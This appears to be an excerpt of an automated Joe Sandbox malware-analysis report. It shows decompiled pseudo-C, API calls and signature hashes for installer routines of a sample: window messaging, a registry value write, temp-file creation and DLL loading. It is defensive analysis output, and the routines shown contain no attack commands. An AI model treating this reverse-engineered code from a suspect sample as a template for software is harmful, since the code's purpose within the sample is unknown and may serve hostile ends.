                                                    • Part of subcall function 71082810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71081896,00000000), ref: 710828E0
                                                    • Part of subcall function 71081666: wsprintfW.USER32 ref: 71081694
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: 6c94b13cc405f8e6d8ca060d6df145e25ef4925ce3284484e63404f29668058a
                                                  • Instruction ID: a14c3bd6acb20faefd1b658e12f20eb345db1a75d1aa8a0fb349851147cb65af
                                                  • Opcode Fuzzy Hash: 6c94b13cc405f8e6d8ca060d6df145e25ef4925ce3284484e63404f29668058a
                                                  • Instruction Fuzzy Hash: C841A27281C202EFDB119F74D988B993BFEBF08B14F1444A5F98B9A086DB75D085CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 765 401c43-401c63 call 402d84 * 2 770 401c65-401c6c call 402da6 765->770 771 401c6f-401c73 765->771 770->771 773 401c75-401c7c call 402da6 771->773 774 401c7f-401c85 771->774 773->774 777 401cd3-401cfd call 402da6 * 2 FindWindowExW 774->777 778 401c87-401ca3 call 402d84 * 2 774->778 790 401d03 777->790 788 401cc3-401cd1 SendMessageW 778->788 789 401ca5-401cc1 SendMessageTimeoutW 778->789 788->790 791 401d06-401d09 789->791 790->791 792 402c2a-402c39 791->792 793 401d0f 791->793 793->792
                                                  C-Code - Quality: 59%
                                                  			E00401C43(intOrPtr __edx) {
                                                  				int _t29;
                                                  				long _t30;
                                                  				signed int _t32;
                                                  				WCHAR* _t35;
                                                  				long _t36;
                                                  				int _t41;
                                                  				signed int _t42;
                                                  				int _t46;
                                                  				int _t56;
                                                  				intOrPtr _t57;
                                                  				struct HWND__* _t63;
                                                  				void* _t64;
                                                  
                                                  				_t57 = __edx;
                                                  				_t29 = E00402D84(3);
                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  				 *(_t64 - 0x18) = _t29;
                                                  				_t30 = E00402D84(4);
                                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  				 *(_t64 + 8) = _t30;
                                                  				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                  					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                  				}
                                                  				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                  				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                  					 *(_t64 + 8) = E00402DA6(0x44);
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                  				_push(1);
                                                  				if(__eflags != 0) {
                                                  					_t61 = E00402DA6();
                                                  					_t32 = E00402DA6();
                                                  					asm("sbb ecx, ecx");
                                                  					asm("sbb eax, eax");
                                                  					_t35 =  ~( *_t31) & _t61;
                                                  					__eflags = _t35;
                                                  					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                  					goto L10;
                                                  				} else {
                                                  					_t63 = E00402D84();
                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  					_t41 = E00402D84(2);
                                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                  					_t56 =  *(_t64 - 0x1c) >> 2;
                                                  					if(__eflags == 0) {
                                                  						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                  						L10:
                                                  						 *(_t64 - 0x38) = _t36;
                                                  					} else {
                                                  						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                  						asm("sbb eax, eax");
                                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                  					}
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                  				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                  					_push( *(_t64 - 0x38));
                                                  					E00406484();
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                  				return 0;
                                                  			}















                                                  0x00401c43
                                                  0x00401c45
                                                  0x00401c4c
                                                  0x00401c4f
                                                  0x00401c52
                                                  0x00401c5c
                                                  0x00401c60
                                                  0x00401c63
                                                  0x00401c6c
                                                  0x00401c6c
                                                  0x00401c6f
                                                  0x00401c73
                                                  0x00401c7c
                                                  0x00401c7c
                                                  0x00401c7f
                                                  0x00401c83
                                                  0x00401c85
                                                  0x00401cda
                                                  0x00401cdc
                                                  0x00401ce7
                                                  0x00401cf1
                                                  0x00401cf4
                                                  0x00401cf4
                                                  0x00401cfd
                                                  0x00000000
                                                  0x00401c87
                                                  0x00401c8e
                                                  0x00401c90
                                                  0x00401c93
                                                  0x00401c99
                                                  0x00401ca0
                                                  0x00401ca3
                                                  0x00401ccb
                                                  0x00401d03
                                                  0x00401d03
                                                  0x00401ca5
                                                  0x00401cb3
                                                  0x00401cbb
                                                  0x00401cbe
                                                  0x00401cbe
                                                  0x00401ca3
                                                  0x00401d06
                                                  0x00401d09
                                                  0x00401d0f
                                                  0x00402ba4
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                  • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                  • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                  • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 796 40248a-4024bb call 402da6 * 2 call 402e36 803 4024c1-4024cb 796->803 804 402c2a-402c39 796->804 805 4024cd-4024da call 402da6 lstrlenW 803->805 806 4024de-4024e1 803->806 805->806 809 4024e3-4024f4 call 402d84 806->809 810 4024f5-4024f8 806->810 809->810 812 402509-40251d RegSetValueExW 810->812 813 4024fa-402504 call 4032b4 810->813 817 402522-402603 RegCloseKey 812->817 818 40251f 812->818 813->812 817->804 818->817
                                                  C-Code - Quality: 83%
                                                  			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                  				void* _t20;
                                                  				void* _t21;
                                                  				int _t24;
                                                  				long _t25;
                                                  				int _t30;
                                                  				intOrPtr _t33;
                                                  				void* _t34;
                                                  				intOrPtr _t37;
                                                  				void* _t39;
                                                  				void* _t42;
                                                  
                                                  				_t42 = __eflags;
                                                  				_t33 = __edx;
                                                  				_t30 = __ebx;
                                                  				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                  				_t34 = __eax;
                                                  				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                  				 *(_t39 - 0x44) = E00402DA6(2);
                                                  				_t20 = E00402DA6(0x11);
                                                  				 *(_t39 - 4) = 1;
                                                  				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                  				 *(_t39 + 8) = _t21;
                                                  				if(_t21 != __ebx) {
                                                  					_t24 = 0;
                                                  					if(_t37 == 1) {
                                                  						E00402DA6(0x23);
                                                  						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                  					}
                                                  					if(_t37 == 4) {
                                                  						 *0x40b5f0 = E00402D84(3);
                                                  						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                  						_t24 = _t37;
                                                  					}
                                                  					if(_t37 == 3) {
                                                  						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                                  					}
                                                  					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                  					if(_t25 == 0) {
                                                  						 *(_t39 - 4) = _t30;
                                                  					}
                                                  					_push( *(_t39 + 8));
                                                  					RegCloseKey(); // executed
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                  				return 0;
                                                  			}













                                                  0x0040248a
                                                  0x0040248a
                                                  0x0040248a
                                                  0x0040248a
                                                  0x0040248d
                                                  0x00402494
                                                  0x0040249e
                                                  0x004024a1
                                                  0x004024aa
                                                  0x004024b1
                                                  0x004024b8
                                                  0x004024bb
                                                  0x004024c1
                                                  0x004024cb
                                                  0x004024cf
                                                  0x004024da
                                                  0x004024da
                                                  0x004024e1
                                                  0x004024eb
                                                  0x004024f1
                                                  0x004024f4
                                                  0x004024f4
                                                  0x004024f8
                                                  0x00402504
                                                  0x00402504
                                                  0x00402515
                                                  0x0040251d
                                                  0x0040251f
                                                  0x0040251f
                                                  0x00402522
                                                  0x004025fd
                                                  0x004025fd
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy8A61.tmp,00000023,00000011,00000002), ref: 004024D5
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsy8A61.tmp,00000000,00000011,00000002), ref: 00402515
                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsy8A61.tmp,00000000,00000011,00000002), ref: 004025FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp
                                                  • API String ID: 2655323295-3707110098
                                                  • Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                  • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                  • Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                                  • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				intOrPtr _v8;
                                                  				short _v12;
                                                  				short _t12;
                                                  				intOrPtr _t13;
                                                  				signed int _t14;
                                                  				WCHAR* _t17;
                                                  				signed int _t19;
                                                  				signed short _t23;
                                                  				WCHAR* _t26;
                                                  
                                                  				_t26 = _a4;
                                                  				_t23 = 0x64;
                                                  				while(1) {
                                                  					_t12 =  *L"nsa"; // 0x73006e
                                                  					_t23 = _t23 - 1;
                                                  					_v12 = _t12;
                                                  					_t13 =  *0x40a57c; // 0x61
                                                  					_v8 = _t13;
                                                  					_t14 = GetTickCount();
                                                  					_t19 = 0x1a;
                                                  					_v8 = _v8 + _t14 % _t19;
                                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                  					if(_t17 != 0) {
                                                  						break;
                                                  					}
                                                  					if(_t23 != 0) {
                                                  						continue;
                                                  					} else {
                                                  						 *_t26 =  *_t26 & _t23;
                                                  					}
                                                  					L4:
                                                  					return _t17;
                                                  				}
                                                  				_t17 = _t26;
                                                  				goto L4;
                                                  			}












                                                  0x00406062
                                                  0x00406068
                                                  0x00406069
                                                  0x00406069
                                                  0x0040606e
                                                  0x0040606f
                                                  0x00406072
                                                  0x00406077
                                                  0x0040607a
                                                  0x00406084
                                                  0x00406091
                                                  0x00406095
                                                  0x0040609d
                                                  0x00000000
                                                  0x00000000
                                                  0x004060a1
                                                  0x00000000
                                                  0x004060a3
                                                  0x004060a3
                                                  0x004060a3
                                                  0x004060a6
                                                  0x004060a9
                                                  0x004060a9
                                                  0x004060ac
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040607A
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-944333549
                                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                  • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                  • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E004015C1(short __ebx, void* __eflags) {
                                                  				void* _t17;
                                                  				int _t23;
                                                  				void* _t25;
                                                  				signed char _t26;
                                                  				short _t28;
                                                  				short _t31;
                                                  				short* _t34;
                                                  				void* _t36;
                                                  
                                                  				_t28 = __ebx;
                                                  				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                  				_t17 = E00405EB7(_t16);
                                                  				_t32 = _t17;
                                                  				if(_t17 != __ebx) {
                                                  					do {
                                                  						_t34 = E00405E39(_t32, 0x5c);
                                                  						_t31 =  *_t34;
                                                  						 *_t34 = _t28;
                                                  						if(_t31 != _t28) {
                                                  							L5:
                                                  							_t25 = E00405AEB( *(_t36 + 8));
                                                  						} else {
                                                  							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                  							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                  								goto L5;
                                                  							} else {
                                                  								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                  							}
                                                  						}
                                                  						if(_t25 != _t28) {
                                                  							if(_t25 != 0xb7) {
                                                  								L9:
                                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                  							} else {
                                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                  								if((_t26 & 0x00000010) == 0) {
                                                  									goto L9;
                                                  								}
                                                  							}
                                                  						}
                                                  						 *_t34 = _t31;
                                                  						_t32 = _t34 + 2;
                                                  					} while (_t31 != _t28);
                                                  				}
                                                  				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                  					_push(0xfffffff5);
                                                  					E00401423();
                                                  				} else {
                                                  					E00401423(0xffffffe6);
                                                  					E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                  					if(_t23 == 0) {
                                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                  					}
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                  				return 0;
                                                  			}











                                                  0x004015c1
                                                  0x004015c9
                                                  0x004015cc
                                                  0x004015d1
                                                  0x004015d5
                                                  0x004015d7
                                                  0x004015df
                                                  0x004015e1
                                                  0x004015e4
                                                  0x004015ea
                                                  0x00401604
                                                  0x00401607
                                                  0x004015ec
                                                  0x004015ec
                                                  0x004015ef
                                                  0x00000000
                                                  0x004015fa
                                                  0x004015fd
                                                  0x004015fd
                                                  0x004015ef
                                                  0x0040160e
                                                  0x00401615
                                                  0x00401624
                                                  0x00401624
                                                  0x00401617
                                                  0x0040161a
                                                  0x00401622
                                                  0x00000000
                                                  0x00000000
                                                  0x00401622
                                                  0x00401615
                                                  0x00401627
                                                  0x0040162b
                                                  0x0040162c
                                                  0x004015d7
                                                  0x00401634
                                                  0x00401663
                                                  0x004022f1
                                                  0x00401636
                                                  0x00401638
                                                  0x00401645
                                                  0x0040164d
                                                  0x00401655
                                                  0x0040165b
                                                  0x0040165b
                                                  0x00401655
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 4Su,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 1892508949-670666241
                                                  • Opcode ID: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                  • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                  • Opcode Fuzzy Hash: ba54128ff5b5058777b79fccadcb4a48bc090ad694552908408a69dde096ba94
                                                  • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 60%
                                                  			E004020D8(void* __ebx, void* __eflags) {
                                                  				struct HINSTANCE__* _t23;
                                                  				struct HINSTANCE__* _t31;
                                                  				void* _t32;
                                                  				WCHAR* _t35;
                                                  				intOrPtr* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  
                                                  				_t32 = __ebx;
                                                  				asm("sbb eax, 0x434fc0");
                                                  				 *(_t39 - 4) = 1;
                                                  				if(__eflags < 0) {
                                                  					_push(0xffffffe7);
                                                  					L15:
                                                  					E00401423();
                                                  					L16:
                                                  					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                  					return 0;
                                                  				}
                                                  				_t35 = E00402DA6(0xfffffff0);
                                                  				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                  				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                  					L3:
                                                  					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                  					_t47 = _t23 - _t32;
                                                  					 *(_t39 + 8) = _t23;
                                                  					if(_t23 == _t32) {
                                                  						_push(0xfffffff6);
                                                  						goto L15;
                                                  					}
                                                  					L4:
                                                  					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                  					if(_t36 == _t32) {
                                                  						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                  					} else {
                                                  						 *(_t39 - 4) = _t32;
                                                  						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                  							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                  						} else {
                                                  							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                  							if( *_t36() != 0) {
                                                  								 *(_t39 - 4) = 1;
                                                  							}
                                                  						}
                                                  					}
                                                  					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                  						FreeLibrary( *(_t39 + 8));
                                                  					}
                                                  					goto L16;
                                                  				}
                                                  				_t31 = GetModuleHandleW(_t35); // executed
                                                  				 *(_t39 + 8) = _t31;
                                                  				if(_t31 != __ebx) {
                                                  					goto L4;
                                                  				}
                                                  				goto L3;
                                                  			}










                                                  0x004020d8
                                                  0x004020d8
                                                  0x004020dd
                                                  0x004020e4
                                                  0x004021a3
                                                  0x004022f1
                                                  0x004022f1
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x00402c39
                                                  0x00402c39
                                                  0x004020f3
                                                  0x004020fd
                                                  0x00402100
                                                  0x00402110
                                                  0x00402114
                                                  0x0040211a
                                                  0x0040211c
                                                  0x0040211f
                                                  0x0040219c
                                                  0x00000000
                                                  0x0040219c
                                                  0x00402121
                                                  0x0040212c
                                                  0x00402130
                                                  0x00402170
                                                  0x00402132
                                                  0x00402135
                                                  0x00402138
                                                  0x00402164
                                                  0x0040213a
                                                  0x0040213d
                                                  0x00402146
                                                  0x00402148
                                                  0x00402148
                                                  0x00402146
                                                  0x00402138
                                                  0x00402178
                                                  0x00402191
                                                  0x00402191
                                                  0x00000000
                                                  0x00402178
                                                  0x00402103
                                                  0x0040210b
                                                  0x0040210e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,?,755323A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00403418), ref: 004055FA
                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll), ref: 0040560C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
